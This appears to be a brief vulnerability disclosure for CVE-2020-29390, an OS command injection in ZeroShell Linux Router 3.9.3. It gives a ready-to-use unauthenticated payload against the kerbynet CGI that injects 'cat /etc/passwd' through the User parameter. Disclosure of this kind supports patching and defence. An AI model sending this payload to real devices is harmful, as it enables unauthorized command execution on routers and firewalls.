ZeroShell Linux Router 3.9.3 OS Command Injection vulnerability(CVE-2020-29390)

+

Vendor:

Zeroshell Linux Router

https://zeroshell.org/

Product:

ZeroShell-3.9.3-X86.iso

https://zeroshell.org/download/

Zeroshell is a Linux based distribution dedicated to the implementation of Router and Firewall Appliances completely administrable via web interface. > Zeroshell is available for x86/x86-64 platforms and ARM based devices such as Raspberry Pi.

OS Command Injection

When I reviewed the earlier vulnerabilities in zeroshell, I discovered that an OS Command Injection vulnerability still exists in its latest version. You can download here.

Payload: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=

Reference